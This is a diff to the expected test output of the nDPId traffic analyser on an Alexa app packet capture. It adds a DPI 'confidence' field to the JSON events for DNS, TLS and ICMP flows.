+00648{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1529,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027958,"flow_last_seen":1490976030758,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1490976094926,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00659{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1529,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1490976094926,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1586,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976088937,"flow_last_seen":1490976099286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":802,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1490976099286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100559,"flow_last_seen":1490976100559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976100559,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1490976100559,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976100559,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgZAAEAGAiWsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pqQAAAgQFtAQCCAoA9mWXAAAAAAEDAwg="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100811,"flow_last_seen":1490976100811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976100811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -565,18 +565,18 @@
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1490976100999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976100999,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0s4IAACcGiho250hYrBAq2AG7o2ETwX1YiAldXIAS\/\/\/2XwAAAgQFmAMDCAEEAgEB"}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1608,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1490976100999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976100999,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBwFAAEAGDT6sECrYNu8YuoUaAbt\/SWKyQ51EmVAQAVeW5AAA"}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1609,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1490976101000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976101000,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoOO9AAEAGq7msECrYNudIWKNhAbuICV1cE8F9WVAQAVc8uQAA"}
-00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1610,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100811,"flow_last_seen":1490976101001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100859,"flow_last_seen":1490976101001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00905{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976100811,"flow_last_seen":1490976101100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976101100,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976100859,"flow_last_seen":1490976101182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":339,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976101182,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01307{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100859,"flow_last_seen":1490976101183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2974,"flow_avg_l4_payload_len":371,"midstream":0,"ts_msec":1490976101183,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}}
+00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1610,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100811,"flow_last_seen":1490976101001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100859,"flow_last_seen":1490976101001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976100811,"flow_last_seen":1490976101100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976101100,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976100859,"flow_last_seen":1490976101182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":339,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976101182,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01333{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100859,"flow_last_seen":1490976101183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2974,"flow_avg_l4_payload_len":371,"midstream":0,"ts_msec":1490976101183,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1490976101550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976101550,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgdAAEAGAiSsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pRQAAAgQFtAQCCAoA9mX7AAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":3,"flow_last_seen":1490976101623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976101623,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwX5pAAOcGDZw27xi6rBAq2AG7hRl1e+g1UtF3knASH\/6OkAAAAgQFtAEDAwY="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107217,"flow_last_seen":1490976107217,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1490976107217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1490976107217,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"ts_msec":1490976107217,"pkt":"AMDKkaPvePiC0\/vCCABFAABFWlxAAEARM1KsECrYrBAqATiMADUAMXUjXSIBAAABAAAAAAAADHNraWxscy1zdG9yZQZhbWF6b24DY29tAAABAAE="}
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107217,"flow_last_seen":1490976107217,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1490976107217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107217,"flow_last_seen":1490976107217,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1490976107217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1490976107359,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"ts_msec":1490976107359,"pkt":"ePiC0\/vCAMDKkaPvCABFAABV3nRAAEARrymsECoBrBAq2AA1OIwAQbpsXSKBgAABAAEAAAAADHNraWxscy1zdG9yZQZhbWF6b24DY29tAAABAAHADAABAAEAAAA7AAQ27x39"}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1660,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1490976107359,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.253"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1660,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1490976107359,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.253"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1661,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107365,"flow_last_seen":1490976107365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976107365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1490976107365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976107365,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZVhAAEAGqY+sECrYNu8d\/Z+VAbuWKg0YAAAAAKAC\/\/9uYQAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107365,"flow_last_seen":1490976107365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976107365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -587,23 +587,23 @@
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1490976107455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976107455,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fklAAEAGkJ6sECrYNu8d\/Z+YAbtWLhYAAAAAAKAC\/\/+laQAAAgQFtAQCCAoA9mhJAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1667,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1490976107475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976107475,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwq71AAOcGvDU27x39rBAq2AG7n5aOPa1rI6CEzHASH\/6yzwAAAgQFtAEDAwY="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1668,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1490976107477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976107477,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7IxAAEAGIm+sECrYNu8d\/Z+WAbsjoITMjj2tbFAQAVf9QAAA"}
-00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1490976107479,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1490976107479,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1490976107484,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976107484,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwkaBAAOcG1lI27x39rBAq2AG7n5UJgL2ZlioNGXASH\/4siQAAAgQFtAEDAwY="}
